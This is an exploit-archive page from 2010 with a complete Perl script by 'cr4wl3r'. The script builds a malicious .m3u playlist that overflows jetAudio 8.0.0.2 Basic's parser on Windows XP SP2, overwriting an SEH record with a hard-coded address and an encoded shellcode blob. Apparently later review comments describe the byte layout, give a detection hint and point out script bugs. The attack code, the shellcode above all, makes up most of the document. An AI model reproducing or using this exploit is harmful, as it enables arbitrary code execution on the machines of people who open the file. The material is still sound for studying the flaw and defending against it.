jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit

2010-01-21T00:00:00
ID 1337DAY-ID-10148
Type zdt
Reporter cr4wl3r
Modified 2010-01-21T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            ===================================================
jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
===================================================


#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r
# Tested: Windows xp(sp2)
#########################################
#
# Purpose: concatenates a fixed byte string and writes it to a playlist
# file (.m3u) in the current working directory. According to the title,
# the target is the m3u parser of jetAudio 8.0.0.2 Basic; the only tested
# platform the author lists is Windows XP SP2.
#
# Layout of the generated file, in order:
#   "http://" prefix | 1017 filler bytes | 4 bytes ($nseh) |
#   4 bytes ($seh)   | $shellcode        | run of "E" padding
#
# Review notes:
#  - The script has no `use strict` / `use warnings`; two statements
#    below depend on barewords silently being treated as strings.
#  - For detection: the output is a playlist whose single entry starts
#    with "http://", runs to several kilobytes without a line break and
#    contains non-printable bytes, which no ordinary playlist URL does.
#  - NOTE(review): the page does not say which jetAudio versions, if any,
#    are fixed, or which OS-level mitigations were active during testing.
 
# Output file name, relative to the current working directory.
my $file="b00m.m3u";
 
# The entry is made to look like a URL so it is parsed as a playlist item.
my $header = "http://";
# 1017 bytes of filler ("A"). Presumably the distance from the start of
# the copied buffer to the record overwritten next -- the page gives no
# derivation for this number.
my $junk = "A" x 1017;
# Four bytes: EB 06 is an x86 short jump, 90 90 are two NOPs. The names
# $nseh / $seh suggest the classic overwrite of a structured exception
# handler record (next-record pointer, then handler pointer) -- inferred
# from the variable names; the page itself only says "stack overflow".
my $nseh = "\xeb\x06\x90\x90"; 
# pack('V', ...) emits the value as a 32-bit little-endian integer.
# The address is hard-coded; the module it belongs to is not stated.
my $seh = pack('V',0x01221045);
 
# Opaque machine-code blob. The page does not document what it does and
# that cannot be confirmed from the bytes as listed here.
my $shellcode =
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";
 
 
# Trailing padding of "E" bytes.
# NOTE(review): junk, nseh, seh and shellcode are written without sigils.
# With no `use strict` they are bareword strings, so length() measures the
# literal text "junknsehsehshellcode" (20 characters), not the variables;
# the padding is therefore 1980 bytes whatever the variables hold.
my $footer="E" x (2000-length(junk.nseh.seh.shellcode));
 
# Final file content, in the order given in the layout note at the top.
my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;
 
print " Writing payload to file\n";
 
# Two-argument open with a bareword filehandle; the file name is
# interpolated into the mode string. None of open/print/close is checked,
# so the messages below are printed even when nothing was written.
open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
# `b00m` is a bareword string here, so the message always says "b00m"
# and does not reflect the value of $file.
print " Exploit file " . b00m . " created\n";
# Reports the total number of bytes in $payload.
print " b00m " . length($payload) . " bytes\n";


